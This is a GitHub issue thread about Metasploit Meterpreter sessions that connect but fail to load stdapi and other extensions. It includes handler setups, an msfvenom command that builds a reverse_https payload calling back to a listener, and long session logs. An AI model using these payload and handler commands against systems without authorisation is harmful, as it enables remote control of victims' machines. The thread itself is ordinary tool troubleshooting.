Closed ghost closed 9 years ago
Can you please give us all the settings you're using? Please include:
In short, please type "show info" and dump it in here.
Bear in mind the following:
LHOST is publicly visible.
LHOST is the same in the payload as it is in your listener.
LPORT is the same in the payload as it is in your listener.
metsrv and stdapi before you try to execute commands. HTTP(S) payloads aren't the fastest.

Just to sanity-check, I configured some simulated 'bad' networks, and while at the worst it took several minutes to interact on a 200 Kbps, 500ms latency, 5% drop network, I couldn't reproduce a total failure as described above. On the other hand, intentionally setting LHOST incorrectly does lead to exactly this issue, e.g.:
meterpreter > load stdapi
[-] Failed to load extension: No response was received to the core_loadlib request.
I wonder if there is anything we could do to improve the user experience by providing load/liveness status in some way, other than just typing help over and over and waiting for commands to appear :) Maybe something that could appear under 'sessions'
When the session isn't fully initialised, there's no UID listed.
The listener was staged via
./msfconsole -q -L -x 'set workspace myworkspace; use exploit/multi/handler; set payload windows/meterpreter/reverse_http; set LHOST 192.168.1.111; set LPORT 80; run -j'
The following is the payload connecting
And here are the settings in show info
The payload was originally generated about 4 weeks ago using msfpayload | msfencode.
Sorry, I meant show options.
Also, please can you tell me how your payload was generated.
I should have caught that too. The IPs match.
I don't have the exact command that I used to generate the payload. But it was generated with msfpayload | msfencode. Which until about 2 weeks ago was working on a
msfcli multi/handler payload=windows/meterpreter/reverse_http LHOST=192.168.1.111 LPORT=80 E
It sounds like the LHOST values don't match (despite you saying that they do.. sorry!). Your LHOST values in your multi/handlers shown above are local IPs (192.168.*). That wouldn't be routable from the outside. My guess, based on you scrubbing out the IP addresses, is that they don't match.
Is that not fair to say?
Sorry but no.
It'll have to wait until tomorrow until I can dig any further. I will recreate the payload and attempt to do a better job scrubbing IPs before I post. I can do some testing tonight. But I likely won't report again until tomorrow.
@bcook-r7 Having some feedback that the session isn't dead or failed but still loading would be useful. I killed a few on a slow link recently because I thought it failed. In fact I only discovered that it wasn't failing due to walking away as it connected and came back about 10 mins later. I typed ls and there it was. It had been working the whole time!
There is definitely a timeout baked in, otherwise it'd sit there forever. The fact that it can connect once shows that the initial payload is fine. However, something is wrong with the next stage if nothing goes right from there.
Does the target run some kind of AV? Because with reverse_http metsrv goes up in the clear. It could be that it's getting caught?
There are more than AV controls in place. There is also at least a proxy in play here. Interesting. That could be it. The IP was flagged as serving malware by the proxy. However, I loaded the index on the attacker IP in a browser on the client machine before attempting the payload again. It loaded fine. But I did not attempt to download any files from the attacker's web server. I'll run some additional tests and report what I find.
I tried to duplicate the situation in my lab but ultimately could not reproduce the issue. However, I did confirm that it was not any of the controls that are in place preventing the full session from initiating. I did this by running the payload on a machine in my lab and the results were as I originally described. I'm not at all sure how the payload exe file has "corrupted", but that is what I'm going to chalk it up to. If I somehow manage to reproduce I will reopen.
Same problem here, just updated from bleeding edge. My setup:
Payload was generated like:
./msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=172.16.110.1 LPORT=8443 PayloadProxyHost=192.168.124.1 PayloadProxyPort=8081
(I also tried without the PayloadProxy* options, same result)
MSF handler:
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 172.16.110.1 yes The local listener hostname
LPORT 8443 yes The local listener port
msf exploit(handler) > run
[*] Started HTTPS reverse handler on https://172.16.110.1:8443/
[*] Starting the payload handler...
[*] 172.16.110.1:51640 (UUID: 41de17dff4850d44/x86=1/windows=1/2015-06-29T10:57:35Z) Staging Native payload ...
[*] Meterpreter session 1 opened (172.16.110.1:8443 -> 172.16.110.1:51640) at 2015-06-29 13:00:16 +0200
meterpreter > help
meterpreter > [-] Failed to load extension: No response was received to the core_enumextcmd request.
[-] Failed to load extension: No response was received to the core_enumextcmd request.
meterpreter >
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
ssl_verify Modify the SSL certificate verification setting
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
meterpreter > load stdapi
Loading extension stdapi...
[-] Failed to load extension: No response was received to the core_loadlib request.
(also tried with&without the PayloadProxy options)
Burp proxy dump: https://drive.google.com/file/d/0B40sRmFcy0dpYzdOdTNwWXZSSjQ/view?usp=sharing
Are you setting the proxy options in the listener as well as the payload?
Yes, I've tried all combinations.
We currently had the same trouble occurring with a few sessions on low latency networks ... Not sure if that may help but here is the behavior I had:
The exploit/multi/handler successfully receives a connection ... But then, at some point, it hangs while downloading the remaining part of the meterpreter, whether it is loading priv, stdapi or extapi. The payload is windows/meterpreter/reverse_tcp.
Here is a tcpdump : a.b.c.d is the metasploit host while e.f.g.h is the exploited host.
19:40:53.694947 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [.], seq 881541:882901, ack 1, win 29200, length 1360
19:40:53.694949 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [.], seq 882901:884261, ack 1, win 29200, length 1360
19:40:53.862762 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 821701, win 65535, length 0
19:40:53.862785 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [.], seq 884261:885621, ack 1, win 29200, length 1360
19:40:53.862788 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [P.], seq 885621:885811, ack 1, win 29200, length 190
19:40:53.862792 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 824421, win 65535, length 0
19:40:53.862799 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 827141, win 65535, length 0
19:40:53.863562 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 829861, win 65535, length 0
19:40:53.863578 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 832581, win 65535, length 0
19:40:53.875916 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 835301, win 65535, length 0
19:40:53.875932 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 838021, win 65535, length 0
19:40:53.875937 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 840741, win 65535, length 0
19:40:53.875940 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 843461, win 65535, length 0
19:40:53.875943 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 846181, win 65535, length 0
This occurred a few times. It seems that once a PUSH flag is seen, something goes wrong. It may be due to some flags used when establishing the connection.
I have tried on different ports: 433, 5060 and eventually 2488. A last supposition is that depending on the port, some firewall, security solution may mess with the transmission of data.
I also tried to use the advanced option StageEncoding but it didn't change anything.
I also noted that having another connection from the same host like a shell, and continuing to send data like typing dir [Enter] a few times helps the loading of the extensions to complete successfully.
Not sure if this may help.
I was using an updated version of metasploit from the git, metasploit running on Debian 8 64 bits and target running Windows Server 2008.
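Added example (not part of the original thread and not Metasploit code): one way to read the tcpdump excerpt above is to track how many bytes the sending side has on the wire but not yet acknowledged, and compare that with the window the receiver advertises. The function names are hypothetical; the capture lines are the ones quoted in the comment.

```python
import re

# The 14 capture lines quoted in the comment above (addresses were already
# anonymised there as a.b.c.d and e.f.g.h).
CAPTURE = """\
19:40:53.694947 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [.], seq 881541:882901, ack 1, win 29200, length 1360
19:40:53.694949 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [.], seq 882901:884261, ack 1, win 29200, length 1360
19:40:53.862762 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 821701, win 65535, length 0
19:40:53.862785 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [.], seq 884261:885621, ack 1, win 29200, length 1360
19:40:53.862788 IP e.f.g.h.5060 > a.b.c.d.52004: Flags [P.], seq 885621:885811, ack 1, win 29200, length 190
19:40:53.862792 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 824421, win 65535, length 0
19:40:53.862799 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 827141, win 65535, length 0
19:40:53.863562 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 829861, win 65535, length 0
19:40:53.863578 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 832581, win 65535, length 0
19:40:53.875916 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 835301, win 65535, length 0
19:40:53.875932 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 838021, win 65535, length 0
19:40:53.875937 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 840741, win 65535, length 0
19:40:53.875940 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 843461, win 65535, length 0
19:40:53.875943 IP a.b.c.d.52004 > e.f.g.h.5060: Flags [.], ack 846181, win 65535, length 0
"""

# Matches the default tcpdump one-line TCP summary; "seq a:b" is only
# printed for segments that carry payload.
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>\S+) > (?P<dst>\S+): "
    r"Flags \[(?P<flags>[^\]]+)\], "
    r"(?:seq (?P<seq_start>\d+):(?P<seq_end>\d+), )?"
    r"ack (?P<ack>\d+), win (?P<win>\d+), length (?P<length>\d+)$"
)


def parse(text):
    """Turn tcpdump summary lines into dicts; unparseable lines are skipped."""
    packets = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        pkt = m.groupdict()
        for key in ("seq_start", "seq_end", "ack", "win", "length"):
            pkt[key] = int(pkt[key]) if pkt[key] is not None else None
        packets.append(pkt)
    return packets


def flight_report(packets):
    """Track unacknowledged bytes for the endpoint that is sending payload."""
    data = [p for p in packets if p["length"] > 0]
    if not data:
        raise ValueError("no payload-carrying segments in capture")
    sender = data[0]["src"]
    sent = acked = window = None
    push_seen = False
    acks_after_push = 0
    timeline = []  # (timestamp, bytes in flight) once both sides were seen
    for p in packets:
        if p["src"] == sender and p["length"] > 0:
            sent = p["seq_end"] if sent is None else max(sent, p["seq_end"])
            push_seen = push_seen or "P" in p["flags"]
        elif p["dst"] == sender:
            # "win" is the raw header field; if window scaling was negotiated
            # in the (uncaptured) handshake the real window is larger.
            window = p["win"]
            if acked is None or p["ack"] > acked:
                acked = p["ack"]
                acks_after_push += int(push_seen)
        if sent is not None and acked is not None:
            timeline.append((p["ts"], sent - acked))
    flights = [f for _, f in timeline]
    return {
        "sender": sender,
        "receiver_window": window,
        "peak_in_flight": max(flights, default=None),
        "unacked_at_end": flights[-1] if flights else None,
        "acks_after_push": acks_after_push,
        "timeline": timeline,
    }


if __name__ == "__main__":
    report = flight_report(parse(CAPTURE))
    for ts, in_flight in report["timeline"]:
        print(ts, in_flight)
    print({k: v for k, v in report.items() if k != "timeline"})
```

On this excerpt the unacknowledged data peaks just below the advertised 65535-byte window at the segment carrying the PUSH flag, and the excerpt ends with part of the stream still unacknowledged, so a longer capture is needed to see whether the ACKs ever catch up.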
Hi guys, I've had a very strange error: it gives me a connection but then drops it. I'm connecting through a VPN because my router doesn't allow opening ports (because of the ISP), so I had to do it this way. The LHOST is the IP of 0.tcp.ngrok.io that I get when I ping it; the IP that shows up there is the one I put in LHOST, in the payload and in Metasploit. The default port is given to me by ngrok, and I set one of my own, e.g. 80; that one I only set in Metasploit, while the payload uses the ngrok default. Help.
@fuck-hacker:~# msfconsole
=[ metasploit v4.14.10-dev ]
msf > set android/meterpreter/reverse_tcp [-] Unknown variable Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value. If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's datastore. Use -g to operate on the global datastore
msf > use android/meterpreter/reverse_tcp msf payload(reverse_tcp) > set multi/handler [-] Unknown variable Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value. If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's datastore. Use -g to operate on the global datastore
msf payload(reverse_tcp) > use multi/handler msf exploit(handler) > set LHOST 52.15.183.149 LHOST => 52.15.183.149 msf exploit(handler) > set LPORT 12559 LPORT => 12559 msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > set LPORT 12559 LPORT => 12559 msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > back msf > back msf > msf > use PAYLOAD android/meterpreter/reverse_tcp [-] Failed to load module: PAYLOAD msf > set PAYLOAD android/meterpreter/reverse_tcp PAYLOAD => android/meterpreter/reverse_tcp msf > use multi/handler msf exploit(handler) > set LPORT 12559 LPORT => 12559 msf exploit(handler) > set LHOST 52.15.183.149 LHOST => 52.15.183.149 msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:12559:- - [] Started reverse TCP handler on 0.0.0.0:12559 [] Starting the payload handler... ^[[A^C[-] Exploit failed: Interrupt [*] Exploit completed, but no session was created. msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
Payload options (android/meterpreter/reverse_tcp):
Name Current Setting Required Description
LHOST 52.15.183.149 yes The listen address LPORT 12559 yes The listen port
Exploit target:
Id Name
0 Wildcard Target
msf exploit(handler) > set LPORT 80 LPORT => 80 msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 1 opened (127.0.0.1:80 -> 127.0.0.1:36376) at 2017-12-16 16:25:16 -0500
meterpreter > sysinfo [-] Unknown command: sysinfo. meterpreter > [*] 127.0.0.1 - Meterpreter session 1 closed. Reason: Died
msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 2 opened (127.0.0.1:80 -> 127.0.0.1:36388) at 2017-12-16 16:25:39 -0500
meterpreter > help
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
meterpreter > [-] Meterpreter session 1 is not valid and will be closed
[*] 127.0.0.1 - Meterpreter session 2 closed. Reason: Died
msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 3 opened (127.0.0.1:80 -> 127.0.0.1:36412) at 2017-12-16 16:26:59 -0500
meterpreter > machine_id meterpreter > [*] 127.0.0.1 - Meterpreter session 3 closed. Reason: Died [-] Failed to load extension: No response was received to the core_loadlib request. [-] Failed to load extension: No response was received to the core_enumextcmd request. meterpreter > machine_id [+] Machine ID: 6d88e5da93c6e754c677c23a06910a96 msf exploit(handler) > machine_id [-] Unknown command: machine_id. msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 4 opened (127.0.0.1:80 -> 127.0.0.1:36468) at 2017-12-16 16:28:42 -0500
meterpreter > shelp
[-] Unknown command: shelp.
meterpreter > help
meterpreter >
[*] 127.0.0.1 - Meterpreter session 4 closed. Reason: Died
[-] Failed to load extension: No response was received to the core_loadlib request.
[-] Failed to load extension: No response was received to the core_enumextcmd request.
meterpreter > info
Usage: info
Prints information about a post-exploitation module
msf exploit(handler) > info
Name: Generic Payload Handler
Module: exploit/multi/handler
Platform: Android, BSD, Java, JavaScript, Linux, OSX, NodeJS, PHP, Python, Ruby, Solaris, Unix, Windows, Mainframe, Multi Privileged: No License: Metasploit Framework License (BSD) Rank: Manual
Provided by: hdm x@hdm.io
Available targets: Id Name
0 Wildcard Target
Payload information: Space: 10000000 Avoid: 0 characters
Description: This module is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.
msf exploit(handler) > sesions [-] Unknown command: sesions. msf exploit(handler) > help
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
irb Drop into irb scripting mode
load Load a framework plugin
quit Exit the console
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
edit Edit the current module with the preferred editor
info Displays information about one or more modules
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Selects a module by name
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file
Command Description
------- -----------
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Command Description
------- -----------
check Check to see if a target is vulnerable
exploit Launch an exploit attempt
pry Open a Pry session on the current module
rcheck Reloads the module and checks if the target is vulnerable
recheck Alias for rcheck
reload Just reloads the module
rerun Alias for rexploit
rexploit Reloads the module and launches an exploit attempt
run Alias for exploit
msf exploit(handler) > sessions
No active sessions.
msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 5 opened (127.0.0.1:80 -> 127.0.0.1:36502) at 2017-12-16 16:31:13 -0500
meterpreter > screenshot [-] Unknown command: screenshot. meterpreter > shjo [-] Unknown command: shjo. meterpreter > s [-] Unknown command: s. meterpreter > ss [-] Unknown command: ss. meterpreter > sd [-] Unknown command: sd. meterpreter > sd [-] Unknown command: sd. meterpreter > sdmeterpreter > sd [-] Unknown command: sd. smeterpreter > s [-] Unknown command: s. meterpreter > sd [-] Unknown command: sd. meterpreter > sd [-] Unknown command: sd. meterpreter > ds s[-] Unknown command: ds. dmeterpreter > sd [-] Unknown command: sd.
[*] 127.0.0.1 - Meterpreter session 5 closed. Reason: Died sdmeterpreter > sd [-] Unknown command: sd. msf exploit(handler) > dmsf exploit(handler) > set LPORT LPORT => 80 msf exploit(handler) > set LPORT 4040 LPORT => 4040 msf exploit(handler) > RUN [-] Unknown command: RUN. msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:4040:- - [-] Handler failed to bind to 0.0.0.0:4040:- - [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4040). [*] Exploit completed, but no session was created. msf exploit(handler) > exploit
[-] Handler failed to bind to 52.15.183.149:4040:- - [-] Handler failed to bind to 0.0.0.0:4040:- - [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4040). [*] Exploit completed, but no session was created. msf exploit(handler) > set lPORT 80 lPORT => 80 msf exploit(handler) > RUN [-] Unknown command: RUN. msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 6 opened (127.0.0.1:80 -> 127.0.0.1:36722) at 2017-12-16 16:33:26 -0500 [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 7 opened (127.0.0.1:80 -> 127.0.0.1:36726) at 2017-12-16 16:33:27 -0500 [*] Sending stage (67614 bytes) to 127.0.0.1
meterpreter > help
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
meterpreter > transport meterpreter > [-] Failed to load client script file: /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb [-] Failed to load client script file: /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
meterpreter > sessions
Usage: sessions
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i
meterpreter > sessions -i id 1
Usage: sessions
Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i
meterpreter > help
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
meterpreter > [*] 127.0.0.1 - Meterpreter session 6 closed. Reason: Died
[] 127.0.0.1 - Meterpreter session 7 closed. Reason: Died [] 127.0.0.1 - Meterpreter session 8 closed. Reason: Died load Usage: load ext1 ext2 ext3 ...
Loads a meterpreter extension module or modules.
OPTIONS:
-h Help menu.
-l List all available extensions
msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 9 opened (127.0.0.1:80 -> 127.0.0.1:37130) at 2017-12-16 16:35:10 -0500
meterpreter > help
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
meterpreter > [*] 127.0.0.1 - Meterpreter session 9 closed. Reason: Died
msf exploit(handler) > msf exploit(handler) > msf exploit(handler) > exploit
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 10 opened (127.0.0.1:80 -> 127.0.0.1:37138) at 2017-12-16 16:35:27 -0500
meterpreter > uuid [+] UUID: meterpreter > use meterpreter > [*] 127.0.0.1 - Meterpreter session 10 closed. Reason: Died
[-] Meterpreter session 9 is not valid and will be closed [-] Failed to load extension: No response was received to the core_loadlib request. [-] Failed to load extension: No response was received to the core_enumextcmd request. meterpreter > machine_id [+] Machine ID: 6d88e5da93c6e754c677c23a06910a96 msf exploit(handler) > run
[-] Handler failed to bind to 52.15.183.149:80:- - [] Started reverse TCP handler on 0.0.0.0:80 [] Starting the payload handler... [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 11 opened (127.0.0.1:80 -> 127.0.0.1:37222) at 2017-12-16 16:43:24 -0500 [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 12 opened (127.0.0.1:80 -> 127.0.0.1:37226) at 2017-12-16 16:43:24 -0500 [] Sending stage (67614 bytes) to 127.0.0.1 [] Meterpreter session 13 opened (127.0.0.1:80 -> 127.0.0.1:37230) at 2017-12-16 16:43:25 -0500
meterpreter > run[] 127.0.0.1 - Meterpreter session 11 closed. Reason: Died [] 127.0.0.1 - Meterpreter session 12 closed. Reason: Died
[*] 127.0.0.1 - Meterpreter session 13 closed. Reason: Died [-] Failed to load extension: No response was received to the core_enumextcmd request. [-] Failed to load extension: No response was received to the core_enumextcmd request. [-] Failed to load extension: No response was received to the core_loadlib request. [-] Failed to load extension: No response was received to the core_enumextcmd request. [-] Failed to load extension: No response was received to the core_loadlib request. [-] Failed to load extension: No response was received to the core_enumextcmd request.
If you get meterpreter but you can't get any control, type this before enabling the handler: "set AutoLoadStdapi true"
I've been having a reoccurring issue lately (last couple of weeks?). In a nutshell, I am getting a successful meterpreter connect on a windows/meterpreter/reverse_http payload. But when I try to execute meterpreter commands I get a
It happens for help, ls, getuid, sysinfo, all of the meterpreter commands.
In the past it seemed to be a timing issue where if I waited a while on slow links the commands would work as expected. However,
is new and seems like it could be serious.